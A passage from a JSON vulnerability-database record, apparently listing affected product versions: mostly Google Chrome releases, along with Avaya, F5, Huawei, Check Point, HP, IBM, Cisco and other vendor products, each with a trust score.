"chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.803.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.623.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.51" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.21" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.49" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "cloudsystem enterprise software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.345.0" }, { "model": "secureplatform r71.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.215" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.859.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1674.1" }, { "model": "business service automation essentials", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.930.0" }, { "model": "starter kit for cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.562.0" }, { "model": "gaia embedded r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.798.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.227" }, { "model": "oceanstor s2600t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.416.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.59" }, { "model": "dc health check", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.85" }, { "model": "enterprise linux long life 5.9.server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.111" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7855" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.647.0" }, { "model": "uma v200r001c00spc202", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.937.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "gaia embedded r75", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor s5800t v200r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.71" }, { "model": "gss 4492r global site selector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.350.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.30" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.136" }, { "model": "t510 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.867.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.120" }, { "model": "gaia r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.329" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.25" }, { "model": "rack server rh2285 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.746.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1287.1" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.753.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1038.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.7" }, { "model": "nvs v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.496.0" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.728.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.706.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.824.0" }, { "model": "2054-e07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.28" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.0" }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.35" }, { "model": "ipso r71.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.585.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.68" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "e6000 blade server bh640 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.557.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.91" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.15" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.549.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.1" }, { "model": "boot attestation service", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "vcloud director appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "global threat intelligence proxy", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.207" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.440.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.343.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1053.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.957.0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.573.0" }, { "model": "high-density server dh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1055" }, { "model": "espace dcm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.806.0" }, { "model": "enterprise linux server eus 6.4.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.863.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.652.0" }, { "model": "oceanstor s2600t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.5" }, { "model": "exalytics", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.952.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "secureplatform r75.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1019" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.872.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.57" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1022.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.341.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.11" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.223" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1657.0" }, { "model": "espace ums v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1273.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1274.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.0" }, { "model": "oceanstor s6800e v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1303.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1015" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.714.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.8" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.13" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.6" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.150" }, { "model": "secureplatform r70.1", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.230" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.942.0" }, { "model": "gaia embedded r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.4" }, { "model": "aura application server sip core pb19", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "oceanstor s5600t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.49" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.128" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.720.0" }, { "model": "healthanalyzer", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.904.0" }, { "model": "gaia r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.212" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "oceanstor s5900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.55" }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "autobackup server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1052.0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.305.0" }, { "model": "high-density server xh310 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1034" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.145" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 